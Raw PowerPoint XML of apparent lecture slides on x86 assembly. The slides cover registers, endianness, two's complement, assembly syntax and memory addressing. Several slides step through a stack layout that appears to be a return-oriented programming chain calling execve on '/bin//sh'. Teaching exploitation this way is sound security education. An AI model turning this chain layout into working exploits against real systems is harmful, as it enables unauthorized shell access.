            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to select segments (e.g., code, data, stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program status and control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points to the next instruction to be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot be read or set explicitly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is modified by jump and call/return instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be read by executing a call and checking the value pushed on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Floating point units and mmx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39902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17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17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117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117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117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117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117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1171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117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200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="247352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0xbffff618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663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875055795"/>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201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="209080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0xbffff61c</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0x0806e91b</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42271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094731909"/>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0xbffff628</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202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="173314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0xbffff620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79852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666790714"/>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203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="173314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0xbffff620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0x080541b2</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206794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974838730"/>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204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="135951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0xbffff624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28505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754770725"/>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205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="135951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0xbffff624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0x0809a67f</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54069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038650824"/>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206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="96622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0xbffff628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7939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857316152"/>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8438" y="44557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mr-IN"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fi-FI" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x68732f2f</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0x080ea064</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0x6e69622f</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207</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6302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971290" y="626171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0xbffff5ec</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0xbffff62c</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0x0806e91b</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3922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90273872"/>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208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="647010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0xbffff62c</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0x0806e91b</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39223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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109511922"/>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209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="611614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fi-FI">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0xbffff630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72453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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="966366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6292" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Beware of the Endianess </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(and of Signed Integers)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036293" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel uses little endian ordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x03020100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starting at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40   00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B41   01     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B42   02     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B43   03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signed integers are expressed in 2’s complement notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The sign is changed by flipping the bits and adding one, ignoring the overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-1 is 0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-2 is 0xFFFFFFFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?? is 0xFFFFF826</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Having a calculator handy is a good thing...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="940647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629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629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629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629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629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629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629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629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629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629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3629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3629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210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="576218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0xbffff634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0x080bb6d7</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9724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297111210"/>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211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="537872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0xbffff638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28188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648627195"/>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212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="537872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0xbffff638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0x0809a67f</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52486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850274193"/>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213</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="503459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0xbffff63c</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7779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202174613"/>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214</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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0xbffff640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0x0806e91b</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42271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422569715"/>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215</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0xbffff644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82833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427282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193757954"/>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216</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0xbffff644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0x080541b2</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209080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427282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697702604"/>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217</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0xbffff648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25902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391886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819931386"/>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218</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0xbffff648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0x0809a67f</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50200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391886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977220281"/>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219</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0xbffff64c</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236724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355507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863305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2498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86 Assembly Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Slightly) higher-level language than machine language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program is made of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directives: commands for the assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.data identifies a section with variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instructions: actual operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x08048f3f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two possible syntaxes, with different ordering of the operands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AT&amp;T syntax (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, GNU Assembler)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic source, destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOS/Intel syntax (Microsoft Assembler, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, IDA Pro)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic destination, source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be set using: set disassembly-flavor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91496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24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24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24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24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024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0249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0249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0249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02499">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02499">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02499">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0249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220</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0xbffff650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0x080481ca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258401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318144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625741051"/>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221</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0xbffff654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291034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283731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602424798"/>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222</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0xbffff658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0x080e4bd2</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313850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244402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715668028"/>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223</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0xbffff65c</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7461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209080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969618327"/>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224</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0xbffff660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0x0806e91b</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42271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172701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269308453"/>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225</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0xbffff664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182833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136305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64620273"/>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226</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0xbffff664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0x080541b2</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209080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136305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813990975"/>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227</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0xbffff668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341642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96976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275485435"/>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228</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0xbffff668</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0x0807b407</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368569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96976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901941691"/>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229</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0xb</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0xbffff690</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0x0807b407</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368569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63023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994420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0690" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory access is composed of width, base, index, scale, and displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Base: starting address of reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index: offset from base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scale: Constant multiplier of index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Displacement: Constant base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Width: (address suffix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>size of reference (b: byte, s: short, w: word, l: long, q: quad)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address = base + index*scale + displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>displacement(base, index, scale)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x20(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 4), %</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1398582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06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06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106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106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106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106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1069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1069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1069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10691">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1069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862826" y="1178389"/>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0xbffff664</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852938" y="468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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852939" y="632132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0xbffff62c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="374371" y="288073"/>
          <a:ext cx="2831284" cy="621792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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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5461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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0807b406</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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080e4bd1</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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080481c9</a:t>
                      </a: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r h="3546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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080541b0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080ea070</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
